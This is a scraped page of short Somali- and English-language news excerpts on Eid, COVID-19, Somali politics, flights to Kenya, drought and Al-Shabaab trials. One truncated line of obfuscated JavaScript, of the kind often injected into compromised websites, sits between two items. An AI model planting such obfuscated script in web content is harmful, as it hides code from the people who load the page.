Bulshada Soomaaliyeed oo looga digay qatarta cudurka Covid-19
Maamulka Isbitaalka Martiini ayaa uga digay bulshada in aad looga taxadaro faafitaanka cudurka COVID-19 inta lagu jiro damaashaadka Ciidda.
Agaasimaha Isbitaalka Martiini Dr Cabdirisaaq Yuusuf Axmed oo la hadlay Warbaahinta Qaranka ayaa sheegay ayaa bulshada Sooamaliyeed uga digay faafidda cudurka COVID-19 oo ay keeni karto isu imaatanka iyo booqashada ehelada maalmaha ciidda ee beri...
Madaxweynaha JF oo hambalyada ciida u diray shacabka Soomaaliyeed
Madaxweynaha Jamhuuriyadda Federaalka Soomaaliya Mudane Maxamed Cabdullaahi Farmaajo ayaa ugu hambalyeeyay dhammaan ummadda Soomaaliyeed meel kasta oo ay joogaan bilashada bisha Soonfur iyo munaasabadda qiimaha badan ee Ciidul Fidriga.
Madaxweynaha Jamhuuriyadda ayaa ku boorriyay dhammaan shacabka Soomaaliyeed in ay istaakuleeyaan oo garab istaagaan dadkeenna danyarta ah, si dhammaanteen aynu u dareenno farxadda ciidda, taasoo...
Duqa magaalada Muqdisho oo digniin culus soo saaray + Sawirro
Guddoomiyaha Gobolka Banaadir ahna Duqa Magaalada Muqdisho Mudane Cumar Maxamuud Maxamed (Cumar Filish) ayaa kormeer kadis ah ku tagay qaar kamid ah wadooyinka Caasimadda si uu Nadaafada wadooyinkaasi ugala xisaabtamo maamulada degmooyinka.
Duqa magaalada Muqdisho ayaa sheegay in aan la aqbali doonin nadaafaddarida kajirta qaar kamid ah wadooyinka Caasimadda islamarkaana maamul kaste lagula xisaabtamayo...
Madaxweyne Farmaajo oo kulan la qaatay dhigiisa dalka Burundi
Madaxweyaha Jamhuuriyadda Federaalka Soomaaliya Mudane Maxamed Cabdullaahi Farmaajo iyo dhiggiisa dalka Burundi Mudane Évariste Ndayishimiye oo kulan-doceed ku yeeshay caasimadda Kambaala ee dalka Uganda ayaa ka wada hadlay xoojinta xiriirka labada dal ee ku qotoma dhinacyada iskaashiga ammiga, dhaqaalaha iyo siyaasadda.
Kulanka ayaa ku soo idlaaday jawi is afgarasho ah
function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return...
Greek government investigate migrant deaths on Chios
Greece's Ministry of Immigration and Asylum has dispatched a special unit of investigators to the island of Chios following the recent deaths of two migrants who were staying at the VIAL refugee camp, it announced on Monday.
A 51-year-old Iraqi man died on Sunday evening, following closely the death of a 28-year-old Somalian father-of-five...
Somalia regrets Kenya’s move to ban flights
The Somali government on Tuesday regretted Kenya's decision to suspend commercial flights to and from Mogadishu, the capital of Somalia.
Somali Minister of Transport and Civil Aviation Duran Farah said the decision by Nairobi will jeopardize the recently restored diplomatic relations between the two neighboring countries.
Farah told Radio Mogadishu that...
Drought, torrential rains devastate Somalia
The United Nations warns Somalia faces a perilous future as drought followed by torrential rains have destroyed this year’s planting season.
Somalia is one of the countries in the world most prone to the erratic and calamitous impacts of climate change. It has been hit by a double climate disaster for more than two...
DF Soomaaliya oo ciida darteed u fasaxday Shaqaalaha Soomaaliyeed
War qoraal ah oo ka soo baxay Wasaaradda Shaqada iyo Arrimaha Bulshada Dowladda Soomaaliya ayaa lagu sheegay in shaqaalaha u shaqeeya hay’adaha Dowladda Federaalka Soomaaliya ay yihiin fasax maalmaha Ciidul Fidriga.
Qoraalkan ka soo baxay Wasaaradda Shaqada iyo Arrimaha Bulshada, ayaa lagu wargaliyay Dhammaan Hay’addaha xukuumadda Federaalka Soomaaliyeed iyo hay’adaha Gaarka loo leyahay Shaqaalahooda...
Puntland oo xukuno adag ku ridday xubno ka tirsan Al-Shabaab
Maxkamadda Ciidamada Puntland ee magaalada Galkacyo, ayaa xukun dil ah ku ridday shan xubnood oo lagu helay in ay ka tirsan yihiin dhaq-dhaqaaqa Al-Shabaab.
Maxkamadda ayaa sheegtay in shantan xubnood ay ku caddaatay in ay ka tirsan yihiin Al-Shabaab, isla-markaana dilal kala duwan ka fuliyeen gudaha magaalada Gaalkacyo sannadihii u dambeeyay.
Maxaa ka jira in Kenya Airways ay billaabeyso duulimaadyo Hargeysa ah?
Shirkadda diyaaradaha Kenya Airways ayaa sheegtay in weli uu hakad ku jiro qorshe ay ku billaabeyso duulimaadyo isaga kala goosha magaalooyinka Nairobi iyo Hargeysa, ayada oo beenisay warar shalay soo baxay.
Qaar ka mid ah baraha bulshada ayaa waxaa shalay ku baahiyey qoraal loo tiriyey shirkadda oo lagu sheegay inay duulimaadyada Hargeysa billaabeyso daba-yaaqada...













